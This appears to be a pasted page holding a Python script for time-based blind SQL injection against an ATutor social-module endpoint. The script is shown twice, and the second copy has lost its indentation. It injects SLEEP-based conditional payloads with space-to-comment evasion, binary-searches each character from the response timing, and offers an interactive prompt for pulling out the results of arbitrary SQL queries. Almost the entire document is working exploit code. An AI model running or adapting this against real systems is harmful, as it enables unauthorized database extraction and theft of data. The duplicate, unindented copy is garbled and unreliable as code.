DrMeosch · January 11, 2020 14:14
diff --git a/sqli.py b/sqli.py
 #!/usr/bin/env python3.7
 # *-* coding: utf-8 *-*
 from requests.exceptions import HTTPError, Timeout
 from urllib.parse import quote, quote_plus
 from time import perf_counter
 from cmd import Cmd
 import requests
 import sys
 import re

 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

 proxies = {'http':'http://127.0.0.1:8080',
        'https':'http://127.0.0.1:8080'}

 url = 'http://atutor/ATutor/mods/_standard/social/index_public.php'
 method = "POST"
 delay = 1*3 # 10sec
 params = "rand_key=123&myFriendsOnly=1&search_friends_123=off"
 comment = "#"
 check_str = False
 # check_str = "offen"

 def make_request(s, p):
    """Make request to the target url and measure the delay"""
    # Hackaround to bypass params url-encoding cuz we handle it on our own
    # https://stackoverflow.com/questions/23496750/how-to-prevent-python-requests-from-percent-encoding-my-urls
    # payload_str = "&".join("%s=%s" % (k,v) for k,v in p.items())
    p = prepare_statement(p)
    p = params + quote(p)
    t1 = perf_counter()
    if method == "GET":
        r = s.get(url + "?" + p)
    else:
        s.headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        r = s.post(url, p)
    t2 = perf_counter()
    if (r.status_code == 200):
        if(check_str is False):
            # Time-based sqli here
            if (t2 - t1) > delay:
                return True
        else:
            if re.search(check_str, r.text, re.I):
                return True


 def prepare_statement(str1):
    """Prepare sql statement, replace spaces and escape strings if needed"""
    str1 = str1.replace(" ", "/**/")
    # str1 = str1.replace('\'', '$$')
    return str1


 def get_string(s, s_sql, counter):
    a = 32
    b = 125
    while 1:
        # print (a, b)
        if (b - a < 0):
            break
        elif (b - a < 6):
            # here = statement
            # if fount break, else return
            str1 = "') OR 1=IF(ASCII(SUBSTRING((%s),%d,1))=%d,SLEEP(%d),0)#" % (s_sql, counter, a, delay)
            r = make_request(s, str1)
            if r:
                sys.stdout.write(chr(a))
                sys.stdout.flush()
                get_string(s, s_sql, (counter+1))
                break
            else:
                a += 1
        else:
            c = (b - a) // 2
            str1 = "') OR 1=IF(ASCII(SUBSTRING((%s),%d,1))>%d,SLEEP(%d),0)#" % (s_sql, counter, a + c, delay)
            r = make_request(s, str1)
            if r:
                a = a + c
            else:
                b = a + c


 class Terminal(Cmd):
    prompt = "sql -> "

    def default(self, args):
        if len(args) > 2:
            # print (len(args))
            s = requests.Session()
            s.verify = False
            s.proxies = proxies

            r = get_string(s, args, 1)
            # print(r)
            sys.stdout.write("\n")
            sys.stdout.flush()
        else:
            print(' ')


 if __name__ == "__main__":
    term = Terminal()
    term.cmdloop()
	#!/usr/bin/env python3.7
	# - coding: utf-8 -
	from requests.exceptions import HTTPError, Timeout
	from urllib.parse import quote, quote_plus
	from time import perf_counter
	from cmd import Cmd
	import requests
	import sys
	import re

	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

	proxies = {'http':'http://127.0.0.1:8080',
	'https':'http://127.0.0.1:8080'}

	url = 'http://atutor/ATutor/mods/_standard/social/index_public.php'
	method = "POST"
	delay = 1*3 # 10sec
	params = "rand_key=123&myFriendsOnly=1&search_friends_123=off"
	comment = "#"
	check_str = False
	# check_str = "offen"

	def make_request(s, p):
	"""Make request to the target url and measure the delay"""
	# Hackaround to bypass params url-encoding cuz we handle it on our own
	# https://stackoverflow.com/questions/23496750/how-to-prevent-python-requests-from-percent-encoding-my-urls
	# payload_str = "&".join("%s=%s" % (k,v) for k,v in p.items())
	p = prepare_statement(p)
	p = params + quote(p)
	t1 = perf_counter()
	if method == "GET":
	r = s.get(url + "?" + p)
	else:
	s.headers = {'Content-Type': 'application/x-www-form-urlencoded'}
	r = s.post(url, p)
	t2 = perf_counter()
	if (r.status_code == 200):
	if(check_str is False):
	# Time-based sqli here
	if (t2 - t1) > delay:
	return True
	else:
	if re.search(check_str, r.text, re.I):
	return True


	def prepare_statement(str1):
	"""Prepare sql statement, replace spaces and escape strings if needed"""
	str1 = str1.replace(" ", "/**/")
	# str1 = str1.replace('\'', '$$')
	return str1


	def get_string(s, s_sql, counter):
	a = 32
	b = 125
	while 1:
	# print (a, b)
	if (b - a < 0):
	break
	elif (b - a < 6):
	# here = statement
	# if fount break, else return
	str1 = "') OR 1=IF(ASCII(SUBSTRING((%s),%d,1))=%d,SLEEP(%d),0)#" % (s_sql, counter, a, delay)
	r = make_request(s, str1)
	if r:
	sys.stdout.write(chr(a))
	sys.stdout.flush()
	get_string(s, s_sql, (counter+1))
	break
	else:
	a += 1
	else:
	c = (b - a) // 2
	str1 = "') OR 1=IF(ASCII(SUBSTRING((%s),%d,1))>%d,SLEEP(%d),0)#" % (s_sql, counter, a + c, delay)
	r = make_request(s, str1)
	if r:
	a = a + c
	else:
	b = a + c


	class Terminal(Cmd):
	prompt = "sql -> "

	def default(self, args):
	if len(args) > 2:
	# print (len(args))
	s = requests.Session()
	s.verify = False
	s.proxies = proxies

	r = get_string(s, args, 1)
	# print(r)
	sys.stdout.write("\n")
	sys.stdout.flush()
	else:
	print(' ')


	if __name__ == "__main__":
	term = Terminal()
	term.cmdloop()
No results found